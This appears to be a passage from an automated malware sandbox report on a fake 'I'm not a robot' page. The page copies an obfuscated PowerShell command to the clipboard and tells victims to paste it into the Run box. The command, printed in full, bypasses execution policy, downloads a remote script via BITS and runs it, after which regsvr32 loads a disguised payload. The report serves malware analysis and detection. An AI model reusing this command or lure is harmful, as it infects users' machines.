        Source: screenshotOCR Text: -8 x about:blank Booking.cam - Partner Hub X confirm -id2719.click Robot or human ? Check the box to confllm that you're human. Thank You! c I'm not a robot Priva:y - Terme Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 09:20 ENG p Type here to search SG 29/05/2025
        HTML page adds supicious text to clipboard
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Powershell uses Background Intelligent Transfer Service (BITS)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dll

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7716
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2122
        Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 7716 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 2122 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
